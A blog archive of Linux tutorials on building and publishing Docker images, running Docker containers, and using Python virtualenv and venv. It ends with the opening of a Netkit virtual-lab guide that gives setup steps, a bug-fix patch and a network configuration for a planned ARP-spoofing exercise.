
19 December 2021

How to create your own custom Docker images


In a previous article we covered the basics of docker image usage, but there we used images built by others. That's great if you find the image you are looking for, but what happens if none fits your needs?

In this article we are going to explain how to create your own images and upload them to Docker Hub, so they can be easily downloaded into your projects' environments and shared with other developers.


To cook you need a recipe

Provided that you followed the tutorial previously linked, you'll already have docker installed in your linux box. Once docker is installed, you need a recipe to tell it how to "cook" your image. That recipe is a file called Dockerfile that you create in a folder of your choice, along with any files you want to include in your image.

What do you cook with that recipe? An image. But what is a docker image? A docker image is a ready-to-use virtual linux operating system with a specific configuration and set of dependencies installed. How you use that image is up to you. Some images are provided "as-is", as a base point where you are supposed to install your application and run it inside. Other images are more specific and contain an app that is executed as soon as you run that image. Just keep in mind that a docker image is like what an OOP language calls a "class", while a container is an instance of that class (an OOP language would call it an "object"). You may have many containers running that were started from the same image.

To understand how a Dockerfile works, we are going to assess some examples.

Let's start with this Dockerfile from the vdist project. The image you build with that Dockerfile is intended to compile a python distribution and run an application called fpm over a folder that is created at runtime, when a container of the image is used. So, this Dockerfile is supposed to install every dependency needed to compile python and run fpm.

As a first step, every Dockerfile starts by defining which image you are going to use as a starting point. Following the OOP metaphor, our image being a class, we need to define which class it inherits from.
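The Dockerfile itself is not reproduced here, but its first line, as described in the next paragraph, is just:

FROM ubuntu:latest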

In this case, our image is derived from the ubuntu:latest image, but you can use any image available at Docker Hub. Just take care to check that image's Docker Hub page to find out which tag to use. Once you upload your image to Docker Hub, others may use it as a base point for their respective images.

Every art piece must be signed. Your image is no different, so you should define some metadata for it:
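Metadata is usually defined with LABEL commands. A minimal sketch (the description value here is just illustrative, not vdist's actual labels):

LABEL maintainer="dante-signal31 (dante.signal31@gmail.com)"
LABEL description="Image to compile python distributions and run fpm over them."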

The real meat comes with the RUN commands. Those are what you use to configure your image.

Some people misunderstand what RUN commands are intended for the first time they try to build a docker image. RUN commands are not executed when a container is created from an image with the "docker run" command. Instead, they are run only once, by "docker build", to create an image from a Dockerfile.

The exact set of RUN commands will vary depending on your project's needs. In this example the RUN commands check that the apt sources list is OK, update the apt database and install a bunch of dependencies using both "apt-get" and "gem install".

However, you'd better start your set of RUN commands with a "RUN set -e"; this makes your entire image build fail if any RUN command returns an error. It may seem an extreme measure, but that way you are sure you are not uploading an image with unnoticed errors.

Besides, when you review Dockerfiles from other projects you will find that many of them include several shell commands inside the same RUN command, as our example does in lines 14-16. Docker people recommend grouping shell commands inside the same RUN command when they are related to each other (i.e. if two commands make no sense executed without the other, they should be run inside the same RUN command). That's because of how images are built using a layer structure, where every RUN command is a separate layer. Following Docker's advice, your images should be quicker to rebuild when you make any change to their Dockerfile. To include several shell commands inside the same RUN command, put each command on its own line and end every line except the last with "&& \" to chain them, as the example shows.
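As a sketch of what that chaining looks like (the exact packages below are just illustrative, not the actual vdist dependency list):

RUN apt-get update && \
    apt-get install -y build-essential curl ruby ruby-dev && \
    gem install fpm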

Apart from RUN commands, there are others you should know. Let's review the Dockerfile from my project markdown2man. That image is intended to run a python script that uses Pandoc to convert a file, using arguments passed by the user when a container is started from that image. So, at the start of that Dockerfile you can find some now already familiar commands:
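Reconstructed from the build output shown later in this article, those first familiar lines look like this:

FROM python:3.8
LABEL maintainer="dante-signal31 (dante.signal31@gmail.com)"
LABEL description="Image to run markdown2man GitHub Action."
LABEL homepage="https://github.com/dante-signal31/markdown2man"
RUN set -e
RUN apt-get update \
    && apt-get install pandoc -y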


But, from there things turn interesting with some new commands.

With ENV commands you can create environment variables to be used in the following build commands, so you don't have to repeat the same string over and over again and modifications become simpler:
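In the markdown2man Dockerfile, the variable that names the folder where the script will live is defined this way (as step 7 of the build output below shows):

ENV SCRIPT_PATH /script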


Nevertheless, be aware that environment variables created with ENV commands outlast the build phase and persist when a container is created from that image. That can provoke collisions with other environment variables created later. If you only need the variable during the build phase and want it gone when a container is created from the image, then use ARG commands instead of ENV ones.
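A minimal sketch of the difference (the variable names here are hypothetical, not taken from markdown2man):

# Available at build time and inside the running container.
ENV APP_VERSION 1.0
# Available only while "docker build" runs; gone in the final container.
ARG BUILD_DATE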

To include your application files inside the image use COPY commands:
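In the markdown2man case, the COPY commands shown in the build output below are:

COPY requirements.txt $SCRIPT_PATH/
COPY src/lib/* $SCRIPT_PATH/lib/
COPY src/markdown2man.py $SCRIPT_PATH/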


Those commands copy a source file, relative to the Dockerfile location on the host where you are building the image, to a path inside that image. In this example, we are copying requirements.txt, which is located alongside the Dockerfile, to a folder called /script (as the SCRIPT_PATH environment variable defines) inside the image.

Last, but not least, we find another new command: ENTRYPOINT.
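In markdown2man's case (step 14 of the build output below) it is simply:

ENTRYPOINT ["markdown2man"]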


An ENTRYPOINT defines which command to run when a container is started from this image, so that arguments passed to "docker run" are actually passed to this command. The container will stay alive until the command defined at the ENTRYPOINT returns.

ENTRYPOINTs are great for using docker containers to run commands without polluting your user system with the packages those commands need.
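For example, with markdown2man anything you write after the image name goes straight to the entrypoint script (the placeholder below stands for whatever arguments markdown2man actually expects; they are not detailed here):

dante@Camelot:~/$ docker run --rm dantesignal31/markdown2man:latest <arguments-for-markdown2man>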

Time to cook

Once your recipe is ready, you must cook something with it.

When your Dockerfile is ready, use the docker build command to create an image from it. Provided you are in the same folder as your Dockerfile:

dante@Camelot:~/Projects/markdown2man$ docker build -t dantesignal31/markdown2man:latest .
Sending build context to Docker daemon  20.42MB
Step 1/14 : FROM python:3.8
 ---> 67ec76d9f73b
Step 2/14 : LABEL maintainer="dante-signal31 (dante.signal31@gmail.com)"
 ---> Using cache
 ---> ca94c01e56af
Step 3/14 : LABEL description="Image to run markdown2man GitHub Action."
 ---> Using cache
 ---> b749bd5d4bab
Step 4/14 : LABEL homepage="https://github.com/dante-signal31/markdown2man"
 ---> Using cache
 ---> 0869d30775e0
Step 5/14 : RUN set -e
 ---> Using cache
 ---> 381750ae4a4f
Step 6/14 : RUN apt-get update     && apt-get install pandoc -y
 ---> Using cache
 ---> 8538fe6f0c06
Step 7/14 : ENV SCRIPT_PATH /script
 ---> Using cache
 ---> 25b4b27451c6
Step 8/14 : COPY requirements.txt $SCRIPT_PATH/
 ---> Using cache
 ---> 03c97cc6fce4
Step 9/14 : RUN pip install --no-cache-dir -r $SCRIPT_PATH/requirements.txt
 ---> Using cache
 ---> ccb0ee22664d
Step 10/14 : COPY src/lib/* $SCRIPT_PATH/lib/
 ---> d447ceaa00db
Step 11/14 : COPY src/markdown2man.py $SCRIPT_PATH/
 ---> 923dd9c2c1d0
Step 12/14 : RUN chmod 755 $SCRIPT_PATH/markdown2man.py
 ---> Running in 30d8cf7e0586
Removing intermediate container 30d8cf7e0586
 ---> f8386844eab5
Step 13/14 : RUN ln -s $SCRIPT_PATH/markdown2man.py /usr/bin/markdown2man
 ---> Running in aa612bf91a2a
Removing intermediate container aa612bf91a2a
 ---> 40da567a99b9
Step 14/14 : ENTRYPOINT ["markdown2man"]
 ---> Running in aaa4774f9a1a
Removing intermediate container aaa4774f9a1a
 ---> 16baba45e7aa
Successfully built 16baba45e7aa
Successfully tagged dantesignal31/markdown2man:latest

dante@Camelot:~$

If you weren't in the same folder as the Dockerfile, you should replace that "." at the end of the command with the path to the Dockerfile folder.

The "-t" parameter is used to give a proper name (a.k.a. tag) to your image. If you want to upload your image to Docker Hub try to follow its naming conventions. For an image to be uploaded to Docker Hub its name should be composed like: <docker-hub-user>/<repository>:<version>. You can see in the last console example that docker-hub-user parameter was dantesignal31 while repository was markdown2man and version was latest.

Upload your image to Docker Hub

If the build process ended right, you should be able to find your image registered in your system.

dante@Camelot:~/Projects/markdown2man$ docker images
REPOSITORY                   TAG                 IMAGE ID       CREATED          SIZE
dantesignal31/markdown2man   latest              16baba45e7aa   15 minutes ago   1.11GB


dante@Camelot:~$

But an image that is only available locally has limited use. To make it globally available you should upload it to Docker Hub, and to do that you first need an account there. The process to sign up for a new account is similar to any other online service.

Once the sign-up process is done, log in to Docker Hub with your new account. Once logged in, create a new repository. Remember that whatever name you give to your repository, it will be prefixed with your username to get the repo's full name.


In this example, the full name for the repository would be mobythewhale/my-private-repo. Unless you are using a paid account, you'll probably set a "Public" repository.

Remember to tag your image with a repository name matching what you created at Docker Hub.
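If you built the image under a different name, docker tag lets you rename it to match the Docker Hub repository. A sketch using the example repository above (the local image name here is just illustrative):

dante@Camelot:~/Projects/markdown2man$ docker tag markdown2man:latest mobythewhale/my-private-repo:latest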

Before you can push your image, you have to log in to Docker Hub from your console with "docker login":

dante@Camelot:~/Projects/markdown2man$ docker login
Authenticating with existing credentials...
WARNING! Your password will be stored unencrypted in /home/dante/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
dante@Camelot:~$

The first time you log in, you will be asked for your username and password.

Once logged in, you can upload your image with "docker push":

dante@Camelot:~/Projects/markdown2man$ docker push dantesignal31/markdown2man:latest
The push refers to repository [docker.io/dantesignal31/markdown2man]
05271d7777b6: Pushed 
67b7e520b6c7: Pushed 
90ccec97ca8c: Pushed 
f8ffd19ea9bf: Pushed 
d637246b9604: Pushed 
16c591e22029: Pushed 
1a4ca4e12765: Pushed 
e9df9d3bdd45: Mounted from library/python 
1271cc224a6b: Mounted from library/python 
740ef99eafe1: Mounted from library/python 
b7b662b31e70: Mounted from library/python 
6f5234c0aacd: Mounted from library/python 
8a5844586fdb: Mounted from library/python 
a4aba4e59b40: Mounted from library/python 
5499f2905579: Mounted from library/python 
a36ba9e322f7: Mounted from library/debian 
latest: digest: sha256:3e2a65f043306cc33e4504a5acb2728f675713c2c24de0b1a4bc970ae79b9ec8 size: 3680

dante@Camelot:~$

Your image is now available at Docker Hub, ready to be used by anyone else.

Conclusion

We have reviewed the very basics of how to build a docker image. From here, the only way forward is practice: creating increasingly complex images, starting from the simpler ones. Fortunately Docker has great documentation, so it should be easy to solve any blocker you find along the way.

Hopefully all this process will be greatly simplified when Docker Desktop is finally available for linux, as it already is for windows and mac.

29 August 2021

How to use Docker containers


Virtualization is all about deception.

With heavy virtualization (i.e. VMware, VirtualBox, Xen) a guest operating system is deceived into thinking it is running on dedicated hardware, while it is actually shared.

With light virtualization (i.e. Docker) an application is deceived into thinking it is using a dedicated operating system kernel, while it is actually shared too. In Linux, everything but the kernel is considered an application, so with Docker you can make multiple linux distributions share the same kernel (the one from the host system). As this is a higher abstraction level of deception than the VMware kind, it consumes fewer resources; that's why it's called light virtualization. It's so light that many applications are distributed in docker packages (called containers), where the application is bundled along with an operating system and its dependencies, so everything can be run at once on another system without messing with that system's own dependencies.

Sure, there are things light virtualization cannot do, but they are not many. For standard "layer-7" application development you won't find any limitation using Docker virtualization.

Installation

In the past you could install docker from your distribution's package repository. Nowadays you may still find a docker package in your usual package repository, but that no longer works well. If you want to install docker on your computer, you should ignore the packages available in your standard repositories and use the official Docker repositories.

Docker provides package repositories for many distributions. For instance, here you can find instructions to install docker in an ubuntu distribution. Just be aware that if you are using an Ubuntu derivative, like Linux Mint, you're going to need to customize those instructions to set your version in the apt sources list.
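As a reference, the official Ubuntu instructions boil down to something like the following (these commands are a sketch from memory and may be out of date; always check the linked Docker documentation for the current steps):

dante@Camelot:~/$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
dante@Camelot:~/$ sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
dante@Camelot:~/$ sudo apt-get update
dante@Camelot:~/$ sudo apt-get install docker-ce docker-ce-cli containerd.io

On an Ubuntu derivative like Linux Mint, $(lsb_release -cs) returns the Mint codename, so you would replace it manually with the matching Ubuntu codename.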

Once you have installed docker in your computer, you can run a Hello World app, bundled in a container, to check everything works:

dante@Camelot:~/$ sudo docker run hello-world
[sudo] password for dante:
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
b8dfde127a29: Pull complete
Digest: sha256:7d91b69e04a9029b99f3585aaaccae2baa80bcf318f4a5d2165a9898cd2dc0a1
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
1. The Docker client contacted the Docker daemon.
2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
(amd64)
3. The Docker daemon created a new container from that image which runs the
executable that produces the output you are currently reading.
4. The Docker daemon streamed that output to the Docker client, which sent it
to your terminal.

To try something more ambitious, you can run an Ubuntu container with:
$ docker run -it ubuntu bash

Share images, automate workflows, and more with a free Docker ID:
https://hub.docker.com/

For more examples and ideas, visit:
https://docs.docker.com/get-started/

dante@Camelot:~$

Be aware that although you might be able to run docker containers, you may not be able to download and install them without sudo. If you are not comfortable working like that, you can add yourself to the docker group:

dante@Camelot:~/$ sudo usermod -aG docker $USER
[sudo] password for dante:

dante@Camelot:~$

You may need to log out and log back in to activate the change. After that, you can run docker commands as an unprivileged user.

Usage 

You can make your own custom containers, but that is a topic for another article. In this article we are going to use containers customized by others.

To find available containers, head to Docker Hub and type any application or Linux distribution in its search field. The output will show you many options. If you're looking for a raw linux distribution, you'd better use those tagged as "Official image".

Suppose you want to try an app on Ubuntu Xenial: select Ubuntu in the search output and take a look at the "Supported tags..." section. There you can find how the different versions are named for download. In our case we would take note of the "xenial" or "16.04" tags.

Now that you know what to download, let's do it with docker pull:

dante@Camelot:~/$ docker pull ubuntu:xenial
xenial: Pulling from library/ubuntu
528184910841: Pull complete
8a9df81d603d: Pull complete
636d9303bf66: Pull complete
672b5bdcef61: Pull complete
Digest: sha256:6a3ac136b6ca623d6a6fa20a7622f098b2fae1ac05f0114386ef439d8ca89a4a
Status: Downloaded newer image for ubuntu:xenial
docker.io/library/ubuntu:xenial


dante@Camelot:~$

What you've done is download what is called an image. An image is a base package with a specific linux distribution and applications. From that base package you can derive your own custom packages or run instances of that base package; those instances are what we call containers.

If you want to check how many images you have locally available just run docker images:

dante@Camelot:~/$ docker images
REPOSITORY    TAG      IMAGE ID       CREATED        SIZE
ubuntu        xenial   38b3fa4640d4   4 weeks ago    135MB
hello-world   latest   d1165f221234   5 months ago   13.3kB



dante@Camelot:~$

You can start instances (aka containers) from those images using docker run:

dante@Camelot:~/$ docker run --name ubuntu_container_1 ubuntu:xenial
dante@Camelot:~$

Using --name you can assign a specific name to your container, to distinguish it from other containers started from the same image.

The problem with starting containers this way is that they close immediately. You can see it if you check your containers' status using docker ps:

dante@Camelot:~/$ docker ps -a
CONTAINER ID   IMAGE           COMMAND       CREATED          STATUS                      PORTS     NAMES
c7baad2f7e56   ubuntu:xenial   "/bin/bash"   12 seconds ago   Exited (0) 11 seconds ago             ubuntu_container_1
3ba89f1f37c6   hello-world     "/hello"      9 hours ago      Exited (0) 9 hours ago                focused_zhukovsky

dante@Camelot:~$

I've used the -a flag to show every container, not only the active ones. That way you can see that ubuntu_container_1 ended its activity almost immediately after starting. That happens because docker containers are designed to run a specific application and close themselves when that application ends. We did not say which application to run in the container, so it just closed.

Before trying anything else, let's delete the previous container using docker rm, to start from scratch:

dante@Camelot:~/$ docker rm ubuntu_container_1
ubuntu_container_1

dante@Camelot:~$ docker ps -a
CONTAINER ID   IMAGE         COMMAND    CREATED        STATUS                    PORTS     NAMES
3ba89f1f37c6   hello-world   "/hello"   10 hours ago   Exited (0) 10 hours ago             focused_zhukovsky
dante@Camelot:~$

Now we want to keep our container alive to access its console. One way is this:

dante@Camelot:~/$ docker run -d -ti --name ubuntu_container_1 ubuntu:xenial
a14e6bcac57dd04cc777a4eac787a8465acd5b8d379591976c56de1d0acc2798

dante@Camelot:~$ docker ps -a
CONTAINER ID   IMAGE           COMMAND       CREATED         STATUS                    PORTS     NAMES
a14e6bcac57d   ubuntu:xenial   "/bin/bash"   8 seconds ago   Up 7 seconds                        ubuntu_container_1
3ba89f1f37c6   hello-world     "/hello"      10 hours ago    Exited (0) 10 hours ago             focused_zhukovsky
dante@Camelot:~$

We've used the -d flag to run the container in the background and -ti to start an interactive shell and keep it open. Doing so, we can see that this time the container stays up. But we are not yet in the container console; to access it we must use docker attach to connect to that container's shell:

dante@Camelot:~/$ docker attach ubuntu_container_1
root@a14e6bcac57d:/#

Now you can see that the shell prompt has changed. You can leave the container console using exit, but that stops the container. To leave the container while keeping it active, use Ctrl+p followed by Ctrl+q instead.

You can pause an idle container to save resources and resume it later using docker stop and docker start:

dante@Camelot:~/$ docker ps -a
CONTAINER ID   IMAGE           COMMAND       CREATED         STATUS                    PORTS     NAMES
9727742a40bf   ubuntu:xenial   "/bin/bash"   4 minutes ago   Up 4 minutes                        ubuntu_container_1
3ba89f1f37c6   hello-world     "/hello"      10 hours ago    Exited (0) 10 hours ago             focused_zhukovsky
dante@Camelot:~$ docker stop ubuntu_container_1
ubuntu_container_1
dante@Camelot:~$ docker ps -a
CONTAINER ID   IMAGE           COMMAND       CREATED         STATUS                       PORTS     NAMES
9727742a40bf   ubuntu:xenial   "/bin/bash"   7 minutes ago   Exited (127) 6 seconds ago             ubuntu_container_1
3ba89f1f37c6   hello-world     "/hello"      10 hours ago    Exited (0) 10 hours ago                focused_zhukovsky
dante@Camelot:~$ docker start ubuntu_container_1
ubuntu_container_1
dante@Camelot:~$ docker ps -a
CONTAINER ID   IMAGE           COMMAND       CREATED         STATUS                    PORTS     NAMES
9727742a40bf   ubuntu:xenial   "/bin/bash"   8 minutes ago   Up 4 seconds                        ubuntu_container_1
3ba89f1f37c6   hello-world     "/hello"      10 hours ago    Exited (0) 10 hours ago             focused_zhukovsky
dante@Camelot:~$

Saving your changes

Chances are that you want to export the changes made to an existing container, so you can start new containers with those changes already applied.

The best way is using Dockerfiles, but I'll leave that for a later article. A quick and dirty way is to commit your changes to a new image with docker commit:

dante@Camelot:~/$ docker commit ubuntu_container_1 custom_ubuntu
sha256:e2005a0ec8302f8948958a90e2abc1e8957a15155c6e6bbf7300eb1709d4ae70
dante@Camelot:~$ docker images
REPOSITORY      TAG      IMAGE ID       CREATED         SIZE
custom_ubuntu   latest   e2005a0ec830   5 seconds ago   331MB
ubuntu          xenial   38b3fa4640d4   4 weeks ago     135MB
ubuntu          latest   1318b700e415   4 weeks ago     72.8MB
hello-world     latest   d1165f221234   5 months ago    13.3kB

dante@Camelot:~$

In this example we created a new image called custom_ubuntu. Using that new image we can create new instances with the changes made so far to ubuntu_container_1.

Be aware that committing changes from a running container stops it, to avoid data corruption. After the commit ends, the container is resumed.


Running services from containers

So far you have a lightweight virtual machine and access to its console, but that is not enough, as you'll want to offer services from that container.

Suppose you have configured an SSH server in your container and you want to access it from your LAN. In that case you need the container's ports to be mapped by its host and offered to the LAN.

An important gotcha here is that port mapping must be configured when a container is first started with docker run, using the -p flag:

dante@Camelot:~/$ docker run -d -ti -p 8888:22 --name custom_ubuntu_container custom_ubuntu
5ea2604da8c696af397cd1b1f98d7426dd68182e5edd81a56a6b739849ba1e84

dante@Camelot:~$

Now you can access the container's SSH service through the host's port 8888.
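For instance, from another machine on your LAN you could connect with something like this (assuming the container's SSH server accepts that user; the host IP is a placeholder):

dante@Camelot:~/$ ssh -p 8888 root@<host-ip>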


Sharing files with containers

Our containers won't be isolated islands. They may need files from us, or they may need to hand files back to us.

One way to do that file sharing is to start containers with a host folder mounted as a shared folder:

dante@Camelot:~/$ docker run -d -ti -v $(pwd)/docker_share:/root/shared ubuntu:focal
ee64e7392a77b4d0b35adadad467fe5d6a105b84290945e346f82199116b7c56

dante@Camelot:~$

Here, the host folder docker_share will be accessible from the container at the /root/shared container path. Be aware that you should enter absolute paths; I use $(pwd) as a shortcut for the host's current working folder.

Once your container is started, every file placed in its /root/shared folder will be visible from the host, even after the container is stopped. The other way round, that is placing a file from the host so it is seen in the container, is possible too, but you will need sudo:

dante@Camelot:~/$ cp docker.png docker_share/.
cp: cannot create regular file 'docker_share/./docker.png': Permission denied

dante@Camelot:~/$ sudo cp docker.png docker_share/.
[sudo] password for dante:

dante@Camelot:~$

Another way of sharing is using the built-in copy command:

dante@Camelot:~/$ docker cp docker.png vigorous_kowalevski:/root/shared 
dante@Camelot:~$

Here, we have copied the docker.png host file to the vigorous_kowalevski container's /root/shared folder. Note that we didn't need sudo to run docker cp.

The other way round is also possible; just change the argument order:

dante@Camelot:~/$ docker cp vigorous_kowalevski:/etc/apt/sources.list sources.list 
dante@Camelot:~$

Here we copied the container's sources.list to the host.


From here

So far you know how to deal with docker containers. The next step is creating your own custom images using Dockerfiles and sharing them through Docker Hub. I'm going to explain those topics in a further article.

 

25 December 2014

Exporting and importing a virtualenv

One nice thing I recently learnt about virtualenv environments is that they make exporting a project easier.

When you give one of your projects to a friend or collaborator, inside a compressed file, you have to tell them which dependencies to install to run the project. Fortunately virtualenv (actually pip) gives you an automated way to do it.

Suppose you have a project folder you want to export and suppose you have made a virtualenv for that project. With your virtualenv activated, run:

(env)dante@Camelot:~/project-directory$ pip freeze > requirements.txt


This will create a file called requirements.txt. In that file, pip places all the package names and versions installed in that virtualenv. The generated file (in our case requirements.txt) should be included in the exported file bundle.
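A requirements.txt generated this way is just a plain text list of pinned packages, one per line; its exact contents depend on what you installed (the packages below are only illustrative):

Flask==0.10.1
requests==2.3.0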

To import a project exported that way, the importer should uncompress the project folder and create a virtualenv in its location. With that virtualenv activated, pip should be called this way:

(env)otherguy@host:~/project-directory$ pip install -r requirements.txt


This call to pip will install all packages and versions included in requirements.txt. Easy and efficient.





18 October 2014

Virtual environments for real developments, playing with virtualenv

I don't know about you, but I usually develop multiple projects at the same time. The problem is that sometimes you need libraries for a project that are incompatible with those of another. That's why virtualenv exists in the Python world.

Thanks to virtualenv you can keep all the Python versions, libraries, packages, and dependencies for a project separate from one another. It does this by creating an isolated copy of python for your project directory, without worrying about affecting other projects. That is also useful if you have to develop and install libraries on a linux system where you have no sudo/root access to install anything.

Using virtualenv as part of your usual development tools will keep you away from future headaches.

The first step in using virtualenv is to be sure about which version of python you are going to use in your project. The original virtualenv doesn't run right with Python 3, so if you use it you should stay on Python 2.7. Fortunately, since version 3.3 Python includes its own flavour of virtualenv built in, called venv. Be aware that the 3.3 version of venv installs with no pip support, but thankfully that support was added in Python 3.4. We are going to cover both of them in this article: first virtualenv and venv afterwards.

You can install virtualenv using your linux native package manager or python's pip installer. In Ubuntu you can install it through the package manager doing:
dante@Camelot:~$ sudo aptitude install python-virtualenv

Using pip, this should be enough:
dante@Camelot:~$ pip install virtualenv

You can check which version you installed with:
dante@Camelot:~$ virtualenv --version

To use it, just navigate through the console to your project directory and run the following command:
dante@Camelot:~/project-directory$ virtualenv --no-site-packages env
New python executable in env/bin/python
Installing setuptools, pip...done.
dante@Camelot:~/project-directory$

That command will create a directory called env where the binaries that run the virtual environment are placed. The --no-site-packages flag truly isolates your work environment from the rest of your system, as it does not include any packages or modules already installed on your system. That way, you have a completely isolated environment, free from any previously installed packages.

Before your work can start, you should activate your virtual environment by running the activate script:

dante@Camelot:~/project-directory$ source env/bin/activate
(env)dante@Camelot:~/project-directory$
You know you are working in a virtualenv thanks to the environment name surrounded by parentheses to the left of the path in your command line. While you stay in the virtualenv, all packages you install through pip will be stored in your virtual instance of python, leaving your operating system's python alone.

To leave the virtualenv, just type deactivate:

(env)dante@Camelot:~/project-directory$ deactivate
dante@Camelot:~/project-directory$

You should create a virtualenv each time you start a new project.

Using venv in Python 3.4 is not so different. Nevertheless be aware that Ubuntu 14.04 comes with a broken version of venv. If you try to create a virtual environment with venv in Ubuntu 14.04, you'll get an error like this:

dante@Camelot:~/project-directory2$ pyvenv-3.4 env
Error: Command '['/home/dante/project-directory2/env/bin/python3.4', '-Im', 'ensurepip', '--upgrade', '--default-pip']' returned non-zero exit status 1
dante@Camelot:~/project-directory2$

The only way I've found to fix this problem is upgrading the Ubuntu release to 14.10:

dante@Camelot:~/project-directory2$ sudo do-release-upgrade -d

Several hours later you'll get an upgraded Ubuntu 14.10 system. There you may find that venv needs to be installed from a python package:
dante@Camelot:~/project-directory2$ cat /etc/issue
Ubuntu 14.10 \n \l
dante@Camelot:~/project-directory2$ pyvenv-3.4 env
The program 'pyvenv-3.4' is currently not installed. You can install it by typing:
sudo apt-get install python3.4-venv
dante@Camelot:~/project-directory2$ sudo aptitude install python3.4-venv
The following NEW packages will be installed:
  python3.4-venv
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 1,438 kB of archives. After unpacking 1,603 kB will be used.
Get: 1 http://es.archive.ubuntu.com/ubuntu/ utopic/universe python3.4-venv amd64 3.4.2-1 [1,438 kB]
Fetched 1,438 kB in 0s (1,717 kB/s)
Selecting previously unselected package python3.4-venv.
(Reading database ... 237114 files and directories currently installed.)
Preparing to unpack .../python3.4-venv_3.4.2-1_amd64.deb ...
Unpacking python3.4-venv (3.4.2-1) ...
Processing triggers for man-db (2.7.0.2-2) ...
Setting up python3.4-venv (3.4.2-1) ...
dante@Camelot:~/project-directory2$ pyvenv-3.4 env

That way venv runs with no errors:
dante@Camelot:~/project-directory2$ source env/bin/activate
(env)dante@Camelot:~/project-directory2$

Once in your virtual environment you can install every package you need for your development using pip, without messing with your operating system's python libraries. Modern linux distributions make heavy use of python applications, so it's good practice to keep your operating system's python libraries clean, with only what your linux really needs, and manage the application-specific libraries of your developments through their respective virtual environments. For instance, you would use a virtual environment if you needed to develop in Python 3 while keeping your operating system's default python interpreter at version 2.7:

dante@Camelot:~/project-directory2$ source env/bin/activate
(env) dante@Camelot:~/project-directory2$ python
Python 3.4.2 (default, Oct 8 2014, 13:08:17)
[GCC 4.9.1] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> exit()
(env) dante@Camelot:~/project-directory2$ deactivate
dante@Camelot:~/project-directory2$ python
Python 2.7.8 (default, Oct 8 2014, 06:57:53)
[GCC 4.9.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

Don't be shy with virtual environments. You can use them in production too; in fact, they are what is actually recommended for production situations where you don't want an update of your operating system's libraries to break the dependencies of your running application.

20 October 2013

Creating virtual laboratories with Netkit (II)

In my previous article about Netkit we saw a simple example of its ability to simulate a network with multiple devices. The possibilities are almost endless, but we need some kind of automation if we want to simulate complex topologies with many nodes, and especially if we want to pass these topologies to other researchers so they can experiment with them. Netkit provides this level of automation through laboratories: directory structures containing the files needed to configure each of the nodes automatically. The good thing is that we can compress this directory tree and pass it to other researchers, who can boot the lab and have all nodes configured and running with a single command. In addition, the compressed file is really small, since the configuration files of each node are text only.

We are going to prepare an example laboratory to simulate a scenario in which Alice is connected to the Internet from the switched network of her organization. What she doesn't know is that an intruder has gained access to the network and intends to launch an arp-spoofing attack against her to find out which internet pages she visits.


First of all we have to set up Netkit to work properly in laboratory mode. The first step is setting the global variables used by Netkit. In the previous article we configured those variables correctly; the problem is that when you start a laboratory in which one of the computers is connected to the Internet you have to use sudo, which, for security reasons, ignores most global variables, including the ones we configured and used as normal users. A workaround is to configure sudo not to ignore the Netkit variables by editing /etc/sudoers. In the "Defaults" section of this file we must write:

Defaults:dante env_keep+="NETKIT_HOME", env_keep+="MANPATH"

Of course, your own username must be used instead of dante. You also need PATH, and common sense says you should be able to configure it in sudoers like the other two... the problem is that sudo does not work that way and keeps ignoring the user's PATH even if we configure it in sudoers. This is a long-standing bug already reported in the Ubuntu Launchpad. The solution is to create an alias that includes the user's PATH every time we use sudo. To do this, edit the .bash_aliases file in our home directory and write:

#PToNETKIT.

alias sudo="sudo env PATH=$PATH"



With that, Netkit has all the necessary variables, whether we use sudo or run it as a normal user.

Besides, version 2.6 has a bug that prevents the virtual machine that acts as a gateway to the Internet from running properly; the solution is a patch that one of the authors of the application posted on the mailing list:

========================================================
diff -Naur netkit-old/bin/script_utils netkit-new/bin/script_utils
--- netkit-old/bin/script_utils 2007-12-19 10:55:58.000000000 +0100
+++ netkit-new/bin/script_utils 2008-02-02 12:48:46.000000000 +0100
@@ -317,8 +317,8 @@
# This function starts all the hubs inside a given list
runHubs() {
local HUB_NAME BASE_HUB_NAME ACTUAL_HUB_NAME TAP_ADDRESS GUEST_ADDRESS
- HUB_NAME="$1"
while [ $# -gt 0 ]; do
+ HUB_NAME="$1"
BASE_HUB_NAME="`varReplace HUB_NAME \".*_\" \"\"`"
if [ "${BASE_HUB_NAME#tap${HUB_SOCKET_EXTENSION},}" !=
"$BASE_HUB_NAME" ]; then
# This is an Internet connected hub
@@ -328,7 +328,7 @@
startInetHub "$ACTUAL_HUB_NAME" "$TAP_ADDRESS" "$GUEST_ADDRESS"
else
# This is a normal hub
- startHub "$1"
+ startHub "$HUB_NAME"
fi
shift
done
========================================================
One way to apply this patch is to create a text file in $NETKIT_HOME/bin/ called patch2_6_bug with the patch text and then do:
dante@Hades:/usr/share/netkit/bin$ sudo patch script_utils patch2_6_bug
patching file script_utils
dante@Hades:/usr/share/netkit/bin$

This ends the worst part: Netkit preconfiguration. The good thing is that you only have to do it once; from now on you will only have to worry about creating good laboratories.

To begin with ours, we have to create a folder to contain the directory tree and the configuration files. In that folder we create the main configuration file of the laboratory: lab.conf. We can store in that file all the parameters we would use with vstart to define a single machine. We can define how many interfaces each node has and to which collision domain each one belongs (we must remember that, unlike hubs, switches define a different collision domain for each of their ports). Another element that can be defined is the RAM used by each machine. You can also include information to identify the laboratory: its author, version, etc. In our example, the lab.conf file is as follows:

dante@Hades:~/netkit_labs/lab_sniffing_sw$ cat lab.conf
LAB_DESCRIPTION="Laboratorio para simular un ataque de ARP-Spoofing"
LAB_VERSION="0.1"
LAB_AUTHOR="Dante"
LAB_EMAIL="dante.signal31@gmail.com"
LAB_WEB="http://danteslab.blogspot.com/"
PC-Alice[mem]=100
PC-Sniffer[mem]=100
Router[mem]=100
Switch[mem]=100
PC-Alice[0]=CD-A
Switch[1]=CD-A
PC-Sniffer[0]=CD-C
Switch[2]=CD-C
Router[1]=CD-B
Switch[0]=CD-B
Router[0]=tap,

